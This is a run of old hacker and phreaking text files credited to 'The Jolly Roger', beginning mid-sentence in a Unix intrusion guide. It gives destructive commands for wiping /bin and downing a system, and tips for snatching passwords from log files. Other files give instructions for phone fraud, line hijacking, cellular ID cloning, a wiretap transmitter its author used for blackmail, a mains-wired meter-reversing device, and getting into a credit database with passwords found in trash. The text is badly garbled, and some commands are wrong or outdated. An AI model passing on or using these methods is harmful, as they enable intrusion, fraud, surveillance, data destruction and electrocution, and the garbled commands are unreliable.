operator of the system), and thenfinally the normal users. In the unix 'Shell' everything is treated thesame.By this we mean: You can access a program the same way you access a userdirectory, and so on. The way the unix system was written, everything,users included, are just programs belonging to the root directory. Thoseof you who hacked onto the root, smile, since you can screw everything...the main level (exec level) prompt on the unix system is the $, and if youare on the root, you have a # (superuser prompt).Ok, a few basics for the system... To see where you are, and what pathsare active in regards to your user account, then type=> pwdThis shows your acct. seperated by a slash with another pathname (acct.),possibly many times. To connect through to another path,or many paths, you would type:You=> path1/path2/path3
and then you are connected all the way from path1 to path3. You canrun the programs on all the paths you are connected to. If it doesnot allow you to connect to a path, then you have insufficient privs, orthe path is closed and archived onto tape. You can run programs this wayalso:you=> path1/path2/path3/program-nameUnix treats everything as a program, and thus there a few commands tolearn...To see what you have access to in the end path, type=>lsfor list. this show the programs you can run. You can connect tothe root directory and run it's programs with=>/rootBy the way, most unix systems have their log file on the root, so youcan set up a watch on the file, waiting for people to log in and snatchtheirpassword as it passes thru the file. To connect to a directory, use thecommand:=> cd pathname This allows you to do what you wantwith that directory. You may be asked for a password, but this is a gooday of finding other user names to hack onto.The wildcard character in unix, if you want to search down a path fora game or such, is the *.=> ls /*Should show you what you can access. The file types are the same as theyare on a dec, so refer to that section when examining file. To see what isin a file, use the=> prfilename command, for print file.We advise playing with pathnames to get the hang of the concept. Thereis on-line help available on most systems with a 'help' or a '?'.We advise you look thru the help files and pay attention to anythingthey give you on pathnames, or the commands for the system.You can, as a user, create or destroy directories on the tree beneath you.This means that root can kill everything but root, and you can kill anythat are below you. These are the=> mkdir pathname=> rmdir pathnamecommands.Once again, you are not alone on the system... type=>whoto see what other users are logged in to the system at the time. If youwant to talk to them=>write usernameWill allow you to chat at the same time, without having to worryabout the parser. To send mail to a user, say=> mailAnd enter the mail sub-system. To send a message to all the userson the system, say=> wallWhich stands for 'write all'. By the way, on a few systems,all you have to do is hit the key to end the message,but on others you must hit the cntrl-d key.To send a single message to a user, say=> write usernamethis is very handy again! If you send the sequence of characters discussedat the very beginning of this article, you can have the super-user terminaldo
tricks for you again.
Privs:If you want superuser privs, you can either log in as root, or edit youracct. so it can say=> suthis now gives you the # prompt, and allows you to completely by-pass theprotection. The wonderful security conscious developers at bell made itvery difficult to do much without privs, but once you have them, thereis absolutely nothing stopping you from doing anything you want to.To bring down a unix system:=> chdir /bin=> rm *this wipes out the pathname bin, where all the system maintenance filesare.Or try:=> r -rThis recursively removes everything from the system except the removecommand itself.Or try:=> kill -1,1=> syncThis wipes out the system devices from operation.When you are finally sick and tired from hacking on the vax systems, justhit your cntrl-d and repeat key, and you will eventually be logged out._______________________________________The reason this file seems to be very sketchy is the fact that bell has 7licenced versions of unix out in the public domain, and these commands arethose common to all of them. I recommend you hack onto the root orbin directory, since they have the highest levels of privs, and thereis really not much you can do (except develop software) without them._______________________________________
Verification Circuits courtesy of the Jolly Roger (originally an Apple ][ file so forgive the upper case!)
1. ONE BUSY VERIFICATION CONFERENCE CIRCUIT IS ALWAYS PROVIDED.THE CIRCUITIS ATHREE-WAY CONFERENCE BRIDGE THAT ENABLES AN OPERERATOR TO VERIFY THEBUSY/IDLECONDITION OF A SUBSCRIBER LINE.UPON REQUEST OF A PARTY ATTEMPTING TO REACHASPECIFIED DIRECTORY NUMBER, THE OPERATOR DIALS THE CALLED LINE NUMBER TODETERMINE IF THE LINE IS IN USE,IF THE RECEIVER IS OFF THE HOOK,OR IF THELINEIS IN LOCKOUT DUE TO A FAULT CONDITKON.THE OPERATOR THEN RETURNS TO THEPARTYTRYING TO REACH THE DIRE CTORY NUMBER AND STATES THE CONDITION OF THELINE.LINES WITH DATA SECURITY CAN NOT BE ACCESSED FOR BUSY VERIFICATIONWHENTHE LINE IS IN USE.(REFER ALSO TO DATA SECURITY)2. THREE PORTS ARE ASSIGNED TO EACH BUSY VERIFICATION CONFERENCECIRCUIT.ONEPORT IS FOR OPERATOR ACCESS AND TWO PORTS ARE USED TO SPLIT AN EXISTINGCONNECTION.TO VERKFY THE BUSY/IDLE CONDITION OF A LINE,THE OPERATORESTABLISHED A CONNECTION TO THE OPERATOR ACCESS PORT AND DIALS THEDIRECTORYNUMBER OF THE LINE TO BE VERIFIED.IF THE LINE IS IN USE,THE EXISTING
CONNECTION IS BROKEN AND IMMEDIATLY RE-ESTABLISHED THROUGH THEOTHER TWO PORTS OF THE BUSY VERIFICATION CIRCUIT WITHOUT INTERRUPTION.BUSY VERIFICATION CIRCUIT IS CONTROLLED BY ACCESS CODE. A DEDICATED TRUNKCANBE USED BUT IS NOT NECESSARY.3. THE BUSY VREIFICATION CIRCUIT ALSO CAN BE USED FOR TEST VERIFY FROM THEWIRECHIEFS TEST PANEL. B. ADDITIONAL BUSY VERIFICATION CONFERENCE CIRCUITS (002749)O.K. THERE IT IS-RIGHT OUT OF AN ESS MANUAL WORD FOR WORD! (AND IM GETTING25LINEAR FEET OF ESS MANUALS!!! NOT COUNTING THE STACK RECEIVED SO FAR!
Brought to you in the Cookbook by the Jolly Roger!!!!White Box Plans by the Jolly Roger
Introduction:------------ The White Box is simply a portable Touch-Tone keypad. For moreinformation on Touch-Tone, see my Silver Box Plans.Materials:--------- 1 Touch-Tone Keypad 1 Miniature 1000 to 8 Ohm Transformer (Radio Shack # 273-1380) 1 Standard 8 Ohm Speaker 2 9V Batteries 2 9V Battery Clips
Procedure:---------(1) Connect the Red Wire from the Transformer to either terminal on theSpeaker.(2) Connect the White Wire from the Transformer to the other terminal onthe Speaker.(3) Connect the Red Wire from one Battery Clip to the Black Wire from theotherBattery Clip.(4) Connect the Red Wire from the second Battery Clip to the Green Wirefrom the Keypad.(5) Connect the Blue Wire from the Keypad to the Orange/Black Wire fromthe Keypad.(6) Connect the Black Wire from the first Battery Clip to the two abovewires (Blue and Black/Orange).(7) Connect the Black Wire from the Keypad to the Blue Wire from theTransformer.(8) Connect the Red/Green Wire from the Keypad to the Green Wire from theTransformer.(9) Make sure the Black Wire from the Transformer and the remaining wiresfrom the Keypad are free.(10) Hook up the Batteries.
Optional:--------(1) Put it all in a case.(2) Add a Silver Box to it.
Use:
---Just use it like a normal keypad, except put the speaker next to thereceiver of the phone you're using.
---------------------Jolly Roger
The BLAST Box Courtesy of the Jolly Roger
Ever want to really make yourself be heard? Ever talk to someone on thephonewho just doesn't shut up? Or just call the operator and pop her eardrum?Well,up until recently it has been impossible for you to do these things. Thatis,unless of course you've got a blast box. All a blast box is, is a reallycheapamplifier, (around 5 watts or so) connected in place of the microphone onyourtelephone. It works best on model 500 AT&T Phones, and if constructed smallenough, can be placed inside the phone.
Construction:
Construction is not really important. Well it is, but since I'm letting youmakeyour own amp, I really don't have to include this.
Usage:
Once you've built your blast box, simply connect a microphone (or use themicrophone from the phone) to the input of the amplifier, and presto. Thereitis. Now, believe it or not, this device actually works. (At least oncrossbar.)It seems that Illinois bell switching systems allow quite alot of currenttopass right through the switching office, and out to whoever you're calling.Whenyou talk in the phone, it comes out of the other phone (again it works bestifthe phone that you're calling has the standard western electric earpiece)incredibly loud. This device is especially good for PBS Subscriptiondrives.Have "Phun", and don't get caught!
---------------------Jolly Roger Dealing with the Rate & Route Operator
It seems that fewer and fewer people have blue boxesthese days, and that is really too bad. Blue boxes, while notall that great for making free calls (since the TPC can tell whenthe call was made, as well as where it was too and from), arereally a lot of fun to play with. Short of becoming a real liveTSPS operator, they are about the only way you can really playwith the network.
For the few of you with blue boxes, here are some phrases
which may make life easier when dealing with the rate & route(R&R) operators. To get the R&R op, you send a KP + 141 + ST.In some areas you may need to put another NPA before the 141(i.e., KP + 213 + 141 + ST), if you have no local R&R ops.
The R&R operator has a myriad of information, and all ittakes to get this data is mumbling cryptic phrases. There arebasically four special phrases to give the R&R ops. They areNUMBERS route, DIRECTORY route, OPERATOR route, and PLACE NAME.
To get an R&R an area code for a city, one can call theR&R operator and ask for the numbers route. For example, to findthe area code for Carson City, Nevada, we'd ask the R&R op for"Carson City, Nevada, numbers route, please." and get the answer,"Right... 702 plus." meaning that 702 plus 7 digits gets usthere. Sometimes directory assistance isn't just NPA + 131. Theway to get these routings is to call R&R and ask for "Anaheim,California, directory route, please." Of course, she'd tell us itwas 714 plus, which means 714 + 131 gets us the D.A. op there.This is sort of pointless example, but I couldn't come up with abetter one on short notice.
Let's say you wanted to find out how to get to the inwardoperator for Sacremento, California. The first six digits of anumber in that city will be required (the NPA and an NXX). Forexample, let us use 916 756. We would call R&R, and when theoperator answered, say, "916 756, operator route, please." Theoperator would say, "916 plus 001 plus." This means that 916+ 001 + 121 will get you the inward operator for Sacramento. Doyou know the city which corresponds to 503 640? The R&R operatordoes, and will tell you that it is Hillsboro, Oregon, if yousweetly ask for "Place name, 503 640, please."
For example, let's say you need the directory route forSveg, Sweden. Simply call R&R, and ask for, "International,Baden, Switzerland. TSPS directory route, please." In responseto this, you'd get, "Right... Directory to Sveg, Sweden. Countrycode 46 plus 1170." So you'd route yourself to aninternational sender, and send 46 + 1170 to get the D.A. operatorin Sweden.
Inward operator routings to various countries areobtained the same way "International, London, England, TSPSinward route, please." and get "Country code 44 plus 121."Therefore, 44 plus 121 gets you inward for London. Inwards can get you language assitance if you don't speakthe language. Tell the foreign inward, "United Staes calling.Language assitance in completing a call to (called party) at(called number)." R&R operators are people are people too, y'know. Soalways be polite, make sure use of 'em, and dial with care.
---------------Jolly Roger
Cellular Phreaking courtesy of The Jolly Roger
The cellular/mobile phone system is one that is perfectly set up to beexploited by phreaks with the proper knowledge and equipment. Thanks toderegulation, the regional BOC's (Bell Operating Companies) are scatteredand do not communicate much with each other. Phreaks can take advantage ofthis by pretending to be mobile phone customers whose "home base" is a cityserved by a different BOC, known as a "roamer". Since it is impracticalfor each BOC to keep track of the customers of all the other BOC's, theywill usually allow the customer to make the calls he wishes, often with asurcharge of some sort.
The bill is then forwarded to the roamer's home BOC for collection.However, it is fairly simple (with the correct tools) to create a bogus IDnumber for your mobile phone, and pretend to be a roamer from some othercity and state, that's "just visiting". When your BOC tries to collect forthe calls from your alleged "home BOC", they will discover you are not areal customer; but by then, you can create an entirely new electronicidentity, and use that instead. How does the cellular system know who is calling, and where they are?When a mobile phone enters a cell's area of transmission, it transmits itsphone number and its 8 digit ID number to that cell, who will keep track ofit until it gets far enough away that the sound quality is sufficientlydiminished, and then the phone is "handed off" to the cell that thecustomerhas walked or driven into. This process continues as long as the phone haspower and is turned on. If the phone is turned off (or the car is),someoneattempting to call the mobile phone will receive a recording along thelines of "The mobile phone customer you have dialed has left the vehicleor driven out of the service area." When a call is made to a mobilephone,the switching equipment will check to see if the mobile phone being calledis"logged in", so to speak, or present in one of the cells. If it is, thecall will then act (to the speaking parties) just like a normal call - thecaller may hear a busy tone, the phone may just ring, or the call may beanswered. How does the switching equipment know whether or not a particularphone is authorized to use the network? Many times, it doesn't. When adealer installs a mobile phone, he gives the phone's ID number (an 8 digithexadecimal number) to the local BOC, as well as the phone number the BOCassigned to the customer. Thereafter, whenever a phone is present in oneof the cells, the two numbers are checked - they should be registered tothe same person. If they don't match, the telco knows that an attemptedfraud is taking place (or at best, some transmission error) and will notallow calls to be placed or received at that phone. However, it isimpractical (especially given the present state of deregulation) for thetelco to have records of every cellular customer of every BOC. Therefore,if you're going to create a fake ID/phone number combination, it will needto be "based" in an area that has a cellular system (obviously), has adifferent BOC than your local area does, and has some sort of a "roamer"agreement with your local BOC.
How can one "phreak" a cellular phone? There are three general areaswhen phreaking cellular phones; using one you found in an unlocked car(or an unattended walk-about model), modifying your own chip set to looklike a different phone, or recording the phone number/ID numbercombinationssent by other local cellular phones, and using those as your own. Most
cellular phones include a crude "password" system to keep unauthorizedusers from using the phone - however, dealers often set the password(usually a 3 to 5 digit code) to the last four digits of the customer'smobile phone number. If you can find that somewhere on the phone, you'rein luck. If not, it shouldn't be TOO hard to hack, since most peoplearen't smart enough to use something besides "1111", "1234", or whatever.If you want to modify the chip set in a cellular phone you bought(or stole), there are two chips (of course, this depends on the model andmanufacturer, yours may be different) that will need to be changed - oneinstalled at the manufacturer (often epoxied in) with the phone's IDnumber, and one installed by the dealer with the phone number, and possiblethe security code. To do this, you'll obviously need an EPROM burneras well as the same sort of chips used in the phone (or a friendly andunscrupulous dealer!). As to recording the numbers of other mobile phonecustomers and using them; as far as I know, this is just theory... but itseems quite possible, if you've got the equipment to record and decode it.The cellular system would probably freak out if two phones (with validID/phone number combinations) were both present in the network at once,but it remains to be seen what will happen.
-----------------Jolly Roger
Cheesebox Plans Courtesy of The Jolly Roger
A Cheesebox (named for the type of box the first one wasfound in) is a type of box which will, in effect, make yourtelephone a Pay-Phone.....This is a simple,modernized, and easyway of doing it....
Inside Info:These were first used by bookies many years agoas a way of making calls to people without being called by thecops or having their numbers traced and/or tapped......
How To Make A Modern Cheese Box
Ingredients: ------------
1 Call Forwarding service on the line
1 Set of Red Box Tones
The number to your prefix's Intercept operator (do some scanning for this one)
How To: -------
After you find the number to the intercept operator inyour prefix, use your call-forwarding and forward all calls toher...this will make your phone stay off the hook(actually, nowit waits for a quarter to be dropped in)...you now have a cheesebox... In Order To Call Out On This Line:You must use your RedBox tones and generate the quarter dropping in...then,you canmake phone calls to people...as far as I know, this is fairlysafe, and they do not check much...Although I am not sure, Ithink you can even make credit-card calls from a cheeseboxphone and not get traced...

HOW TO START YOUR OWN CONFERENCES! Brought to you by The Jolly Roger
BLACK BART SHOWED HOW TO START A CONFERENCE CALL THRU AN 800 EXCHANGE, ANDIWILL NOW EXPLAIN HOW TO START A CONFERENCE CALL IN A MORE ORTHODOX FASHIO,THE2600 HZ. TONE.
FIRSTLY, THE FONE COMPANY HAS WHAT IS CALLED SWITCHING SYSTEMS. THERE ARESEVERAL TYPES, BUT THE ONE WE WILL CONCERN OURSELVES WITH, IS ESS (ELECTRONICSWITCHING SYSTEM). IF YOUR AREA IS ZONED FOR ESS, DO NOT START ACONFERENCECALL VIA THE 2600 HZ. TONE, OR BELL SECURITY WILL NAIL YOUR ASS! TO FNDOUT IFYOU ARE UNDER ESS, CALL YOUR LOCAL BUSINESS OFFICE, AND ASK THEM IF YOU CANGETCALL WAITING/FORWARDING, AND IF YOU CAN, THAT MEANS THAT YOU ARE IN ESSCOUNTRY, AND CONFERENCE CALLING IS VERY, VERY DANGEROUS!!! NOW, IF YOU ARE NOT INESS,YOU WILL NEED THE FOLLOWING EQUIPMENT:
AN APPLE CAT II MODEM A COPY OF TSPS 2 OR CAT'S MEOW A TOUCH TONE FONE LINE AND A TOUCH TONE FONE. (TRUE TONE)
NOW, WITH TSPS 2, DO THE FOLLOWING:
RUN TSPS 2 CHOSE OPTION 1 CHOSE OPTION 6 CHOSE SUB-OPTION 9
NOW TYPE:
1-514-555-1212 (DASHES ARE NOT NEEDED)
LISTEN WITH YOUR HANDSET, AND AS SOON AS YOU HEAR A LOUD 'CLICK', THEN TYPE
$
TO GENERATE THE 2600 HZ. TONE. THIS OBNOXIOUS TONE WILL CONTINUE FOR A FEWSECONDS, THEN LISTEN AGAIN AND YOU SHOULD HEAR ANOTHER LOUD 'CLICK'.
NOW TYPE:
KM2130801050S
WHERE 'K' = KP TONE 'M' = MULTI FREQUENCY MODE 'S' = S TONE
NOW LISTEN TO THE HANDSET AGAIN, AND WAIT UNTIL YOU HEAR THE 'CLICK' AGAIN.THEN TYPE:
‡ KM2139752975S
WHERE 2139751975 IS THE NUMBER TO BILL THE CONFERENCE CALL TO. NOTE:213-975-1975 IS A DISCONNECTED NUMBER, AND I STRONGLY ADVISE THAT YOU ONLY BILL THECALL TO THIS NUMBER, OR THE FONE COMPANY WILL FIND OUT, AND THEN..........REMEBER, CONFERENCE CALLS ARE ITEMIZED, SO IF YOU DO BILL IT TO AN ENEMY'SNUMBER, HE CAN EASILY FIND OUT WHO DID IT AND HE CAN BUST YOU!
YOU SHOULD NOW HEAR 3 BEEPS, AND A SHORT PRE-RECORDED MESSAGE. FROM HEREON,EVERYTHING IS ALL MENU DRIVEN.
CONFERENCE CALL COMMANDS ---------- ---- --------
FROM THE '#' MODE:
1 = CALL A NUMBER 6 = TRANSFER CONTROL 7 = HANGS UP THE CONFERENCE CALL 9 = WILL CALL A CONFERENCE OPERATR
STAY AWAY FROM 7 AND 9! IF FOR SOME REASON AN OPERATOR GETS ON-LINE,HANG UP! IF YOU GET A BUSY SIGNAL AFTER KM2130801050S, THAT MEANS THAT THETELECONFEREN CING LINE IS TEMPORARILY DOWN. TRY LATER, PREFERRABLY FROM9AM TO5PM WEEK DAYS, SINCE CONFERENCE CALLS ARE PRIMARILY DESIGNED FOR BUSINESSPEOPLE. THE LEECH

Gold Box Plans by The Jolly Roger
HOW TO BUILD IT_______________
You will need the following:
Two 10K OHM and three 1.4K OHM resistorsTwo 2N3904 transistorsTwo Photo CellsTwo Red LED'S (The more light produced the better)A box that will not let light inRed and Green Wire
Light from the #1 LED must shine directly on the photocell #1. The goldbox I made needed the top of the LED's to touch the photo cell for it towork.
The same applies to the #2 photo cell and LED.
1 :-PHOTOCELL--:
: : : :BASE : 1 TTTTT : +LED- TRANSISTOR : TTTTT : : : : -I(-- : :COLLECTORRED1--< >:--: :-------:-----GREEN2 -I(-- : ----------: : : 2 :-/+/+/-/+/+/-/+/+/-/+/+/ LED 10K 10K 1.4K 1.4K RESISTORES
2 -PHOTOCELL----------------- : : :BASE : TTTTT : TRANSISTOR : TTTTT : : :EMITTER :GREEN1- --------------------------RED2 : : /+/+/ 1.4K
The 1.4K resistor is variable and if the second part of the gold box isskipped it will still work but when someone picks up the phone they willhear a faint dial tone in the background and might report it to theGestapo er...(AT&T).1.4K will give you good reception with little risk of a Gestapo agent atyour door.
Now that you have built it take two green wires of the same length andstrip the ends, twist two ends together and connect them to green1 andplace a piece of tape on it with "line #1" writing on it.
Continue the process with red1 only use red wire. Repeat with red2 andgreen2 but change to line #2.


HOW TO INSTALL______________
You will need to find two phone lines that are close together. Label one ofteh phone lines "Line #1". Cut the phone lines and take the outer coatingoff it. Tere should be 4 wires. Cut the yellow and black wires off andstrip the red and green wires for both lines.
Line #1 should be in two pieces. Take the green wire of one end and connectit to one of the green wires on the gold box. Take the other half of line#1 and hook the free green wire to the green wire on the phone line. Repeatthe process with red1 and the other line.
‡All you need to do now is to write down the phone numbers of the place youhooked it up at and go home and call it. You should get a dial tone!!!If not, try changing the emittor with the collector.
Have a great time with this! -----------Jolly Roger
The History of ESS Courtesy of the Jolly Roger
Of all the new 1960s wonders of telephone technology -satellites, ultra modern Traffic Service Positions (TSPS) foroperators, the picturephone, and so on - the one that gave BellLabs the most trouble, and unexpectedly became the greatestdevelopment effort in Bell System's history, was the perfectionof an electronic switching system, or ESS.
It may be recalled that such a system was the specific end inview when the project that had culminated in the invention of thetransistor had been launched back in the 1930s. After successfulaccomplishment of that planned miracle in 1947-48, further delayswere brought about by financial stringency and the need forfurther development of the transistor itself. In the early 1950s,a Labs team began serious work on electronic switching. As earlyas 1955, Western Electric became involved when five engineersfrom the Hawthorne works were assigned to collaborate with theLabs on the project. The president of AT&T in 1956, wroteconfidently, "At Bell Labs, development of the new electronicswitching system is going full speed ahead. We are sure this willlead to many improvements in service and also to greaterefficiency. The first service trial will start in Morris, Ill.,in 1959." Shortly thereafter, Kappel said that the cost of thewhole project would probably be $45 million.
But it gradually became apparent that the developement of acommercially usable electronic switching system - in effect, acomputerized telephone exchange - presented vastly greatertechnical problems than had been anticipated, and that,accordingly, Bell Labs had vastly underestimated both the timeand the investment needed to do the job. The year 1959 passedwithout the promised first trial at Morris, Illinois; it wasfinally made in November 1960, and quickly showed how much morework remained to be done. As time dragged on and costs mounted,there was a concern at AT&T and something approaching panic atBell Labs. But the project had to go forward; by this time theinvestment was too great to be sacrificed, and in any case,forward projections of increased demand for telephone serviceindicated that within a phew years a time would come when,without the quantum leap in speed and flexibility that electronicswitching would provide, the national network would be unable tomeet the demand. In November 1963, an all-electronic switchingsystem went into use at the Brown Engineering Company at CocoaBeach, Florida. But this was a small installation, essentiallyanother test installation, serving only a single company.Kappel's tone on the subject in the 1964 annual report was, forhim, an almost apologetic: "Electronic switching equipment mustbe manufactured in volume to unprecedented standards ofreliability.... To turn out the equipment economically and withgood speed, mass production methods must be developed; but, at
the same time, there can be no loss of precision..." Another yearand millions of dollars later, on May 30, 1965, the firstcommercial electric centeral office was put into service atSuccasunna, New Jersey.
Even at Succasunna, only 200 of the town's 4,300 subscribersinitially had the benefit of electronic switching's added speedand additional services, such as provision for three partyconversations and automatic transfer of incoming calls. But afterthat, ESS was on its way. In January 1966, the second commercialinstallation, this one serving 2,900 telephones, went intoservice in Chase, Maryland. By the end of 1967 there wereadditional ESS offices in California, Connecticut, Minnesota,Georgia, New York, Florida, and Pennsylvania; by the end of 1970there were 120 offices serving 1.8 million customers; and by 1974there were 475 offices serving 5.6 million customers.
The difference between conventional switching and electronicswitching is the difference between "hardware" and "software"; inthe former case, maintenence is done on the spot, withscrewdriver and pliers, while in the case of electronicswitching, it can be done remotely, by computer, from a centeralpoint, making it possible to have only one or two technicians onduty at a time at each switching center. The development program,when the final figures were added up, was found to have requireda staggering four thousand man-years of work at Bell Labs and tohave cost not $45 million but $500 million!
The Lunch Box Courtesy of the Jolly Roger
Introduction===========
The Lunch Box is a VERY simple transmitter which can be handy for all sortsofthings. It is quite small and can easily be put in a number of places. Ihavesuccessfully used it for tapping fones, getting inside info, blackmail andother such things. The possibilities are endless. I will also include theplansor an equally small receiver for your newly made toy. Use it for just aboutanything. You can also make the transmitter and receiver together in oneboxand use it as a walkie talkie.
Materials you will need======================
(1) 9 volt battery with battery clip(1) 25-mfd, 15 volt electrolytic capacitor(2) .0047 mfd capacitors(1) .022 mfd capacitor(1) 51 pf capacitor(1) 365 pf variable capacitor(1) Transistor antenna coil(1) 2N366 transistor(1) 2N464 transistor
(1) 100k resistor(1) 5.6k resistor(1) 10k resistor(1) 2meg potentiometer with SPST switch Some good wire, solder, soldering iron, board to put it on, box (optional)
Schematic for The Lunch Box===========================
This may get a tad confusing but just print it out and pay attention.
[!] ! 51 pf ! ---+---- ------------base collector ! )( 2N366 +----+------/\/\/----GND 365 pf () emitter ! ! )( ! ! +-------- ---+---- ! ! ! ! ! ! ! GND / .022mfd ! ! 10k\ ! ! ! / GND +------------------------emitter ! ! ! 2N464 / .0047 ! basecollector 2meg \----+ ! ! +--------+ ! / ! GND ! ! ! GND ! ! ! +-------------+.0047+--------------------+ ! ! ! +--25mfd-----+ -----------------------------------------+ ! ! microphone +--/\/\/-----+ ---------------------------------------------+ 100k ! ! GND---->/<---------------------!+!+!+---------------+ switch Battery from 2meg pot.
Notes about the schematic=========================
1. GND means ground2. The GND near the switch and the GND by the 2meg potentiometer should be connected.3. Where you see: )( () )( it is the transistor antenna coil with 15 turns of regular hook-up wire around it.4. The middle of the loop on the left side (the left of "()") you shouldrun a wire down to the "+" which has nothing attached to it. There is a.0047 capacitor on the correct piece of wire.5. For the microphone use a magnetic earphone (1k to 2k).6. Where you see "[!]" is the antenna. Use about 8 feet of wire to
broadcast approx 300ft. Part 15 of the FCC rules and regulation says you can't broadcast over 300 feet without a license. (Hahaha). Use more wire foran antenna for longer distances. (Attach it to the black wire on the fone line for about a 250 foot antenna!)
Operation of the Lunch Box==========================
This transmitter will send the signals over the AM radio band. You use thevariable capacitor to adjust what freq. you want to use. Find a good unusedfreq. down at the lower end of the scale and you're set. Use the 2 meg pot.toadjust gain. Just fuck with it until you get what sounds good. The switchonthe 2meg is for turning the Lunch Box on and off. When everything isadjusted,turn on an AM radio adjust it to where you think the signal is. Have afriendlay some shit thru the Box and tune in to it. That's all there is to it.Theplans for a simple receiver are shown below:
The Lunch Box receiver======================
(1) 9 volt battery with battery clip(1) 365 pf variable capacitor(1) 51 pf capacitor(1) 1N38B diode(1) Transistor antenna coil(1) 2N366 transistor(1) SPST toggle switch(1) 1k to 2k magnetic earphone
Schematic for receiver======================
[!] ! 51 pf ! +----+----+ ! ! ) 365 pf (----+ ! ) ! ! +---------+---GND ! +---*>!----base collector----- diode 2N366 earphone emitter +----- ! ! GND ! - + - battery
+ GND------>/<------------+ switch
Closing statement=================
This two devices can be built for under a total of $10.00. Not too bad.Usingthese devices in illegal ways is your option. If you get caught, I acceptNOresponsibility for your actions. This can be a lot of fun if usedcorrectly.Hook it up to the red wire on the phone line and it will send theconversation over the air waves.
Enjoy!
Olive Box Plans Courtesy of the Jolly Roger
This is a relatively new box, and all it basically does is serve as aphoneringer. You have two choices for ringers, a piezoelectric transducer(ringer),or a standard 8 ohm speaker. The speaker has a more pleasant tone to it,buteither will do fine. This circuit can also be used in conjunction with arustbox to control an external something or other when the phone rings. Justconnectthe 8 ohm speaker output to the inputs on the rust box, and control the pottotune it to light the light (which can be replaced by a relay for externalcontrolling) when the phone rings.
______________ ^ NC ---- 5 4 -------/\/\/------->G / R2G<----)------ 6 3 ---- NC C3 U1 --------- 7 2 ------------ --- -- - > TO RINGER ------ 8 1 ---- ______________ ---/\/\/----(----- L1 R1 C1 ------------------------------------------ L2
a. Main ringer TTL circuit
(>::::::::::::::::::::::::::::::::::::::::::::::::::::::::<)
_FROM PIN 2 < - -- --- ---------- _ ------------->G P1
b. Peizoelectric transducer
(>::::::::::::::::::::::::::::::::::::::::::::::::::::::::<)
__ /FROM PIN 2 < - -- --- ---------(---------. .------- / ><>< -- ><><.--- \ T1 c. Elctro magnetic transducerParts List----------
U1 - Texas Instruments TCM1506T1 - 4000:8 ohm audio transfomerS1 - 8 ohm speakerR1 - 2.2k resistorR2 - External variable resistor; adjusts timing frequencyC1 - .47uF capacitorC2 - .1uF capacitorC3 - 10uF capacitorL1 - TipL2 - Ring L1 and L2 are the phone line.
Shift Rate:-----------
This is the formula for determining the shift rate:
1 1 SR = --------------------- = ------------ = 6.25 Hz (DSR(1/f1)+DSR(1/f2)) 128 128 ---- + ---- 1714 1500
DSR = Shift Devider Rate ratio = 128 f1 = High Output Frequency = 1714 f2 = Low Output Frequency = 1500
The Tron Box Written by The GREAT Captain Crunch!! Courtesy of the Jolly Roger
------------------R-----F---- I I I I I I I I- (C) (C) (C) I I I I- I I I I -----------------------------
(C)=CAPACITOR F =FUSE
R =RESISTOR I,- ARE WIRE PARTS LIST: (3) ELECTROLYTIC CAPACITORS RATED AT 50V(LOWEST) .47UF (1) 20-30OHM 1/2 WATT RESISTOR (1) 120VOLT FUSE (AMP RATING BEST TO USE AT LEAST HALF OF TOTAL HOUSE CURRENT OR EVEN LESS IT KEEPS YOU FROM BLOWING YOUR BREAKER JUST IN CASE...) (1) POWER CORD (CUT UP AN EXTENSTION CORD. NEED PLUG PART AND WIRE) (1) ELECTRICALLY INSULATED BOX
REST OF SIF YOUR DONT FILL COMFORTABLE ABOUT ELECTRICITY THEN DONTPLAY WITH THIS THERE IS VOLTAGE PRESENT THAT WILL***KILL*** YOU......................
THE THING WORKS WHEN THE LOAD IN YOUR HOUSE IS LOW LIKE AT NIGHT TIME. ITWILL PUT A REVERSE PHASE SIGNAL ON THE LINE AND CANCEL OUT THE OTHER PHASEAND PUT A REVERSE PHASE RUNNING EVERYTHING IN THE HOUSE. WELL IF YOU HAVEEVER SWITCHED THE POWER LEADS ON A D.C. (BATTERY POWERED) MOTOR YOUWILL SEE THAT IT RUNS BACKWARDS WELL YOUR ELECTRIC METER SORT OF WORKSTHIS WAY...SO REVERSE PHASE MAKES THE METER SLOW DOWN AND IF YOURLUCKY IT WILL GO BACKWARDS. ANYWAY IT MEANS A CHEAPER ELECTRIC BILL.
More TRW Info Courtesy of the Jolly Roger
Trw is a large database in which company's and banks can run creditchecks on their customers. Example: John Jones orders 500$ worth of stereoequipment from the Joe Blow Electronic distributtng Co. Well it could bethathe gave the company a phony credit card number, or doesn't have enoughcredit,etc. Well they call up Trw and then run a check on him, trw then lists hiscard numbers (everything from sears to visa) and tells the numbers, credit,when he lost it last (if he ever did) and then of course tells if he hashadany prior problems paying his bills.
I would also like to add that although Trw contains information onmillions of people, not every part of the country is served, although themajorarea are.. So if you hate someone and live in a small state, you probablywont be able to order him 300 pink toilet seats from K-mart.
Logging on==========
To log on, you dial-up your local access number (or long-distance, whatever turns you on) and wait for it to say "trw" at this promt, you typeeither an "A" or a "Ctrl-G" and it will say "circuit building in progress"it will wait for a minute and then clear the screen, now you will typeone of the following.
Tca1Tca2Tnj1Tga1
This is to tell it what geographical area the customer is in, it reallydoesnt matter which you use, because trw will automatically switch whenit finds the record..
Next, you will type in the pswd and info on the person you are trying toget credit info on: you type it in a format like this:
Rts Pswd Lname Fname ...,House number First letter of street name Zip now you type ctrl s and 2 ctrl q's here is what it looks like in real life:
Ae: Dialing xxx-xxx-xxxx
(screen clear)Trw ^G
circuit building in progress
(pause . . . screen clear)
Tca1
Rtc 3966785-cm5 Johnson David ...,4567R 56785^s ^q ^q
and then it will wait for a few seconds and print out the file on him(if it can locate one for the guy)
note: you may have to push return when you first connect to get the systemsattention.
Getting Your Passwords======================
To obtain pswds, you go down to your favorite bank or sears store anddig through the trash (hence the name trashing) looking for printouts, ifthey are a big enough place, and live in a trw area, then they willprobablyhave some. The printouts will have the 7 digit subscriber code, leavingthe3-4 digit pswd up to you. Much like trashing down at good old ma bell.

Phreaker's Phunhouse Courtesy of the Jolly Roger
The long awaited prequil to Phreaker's Guide has finally arrived.Conceived from the boredom and loneliness that could only be derived from:The Traveler! But now, he has returned in full strength (after a smallvacation) and is here to 'World Premiere' the new files everywhere. Staycool. This is the prequil to the first one, so just relax. This is not madeto be an exclusive ultra elite file, so kinda calm down and watch in thebackground if you are too cool for it.
/-/ Phreak Dictionary /-/

Here you will find some of the basic but necessary terms that shouldbeknown by any phreak who wants to be respected at all.
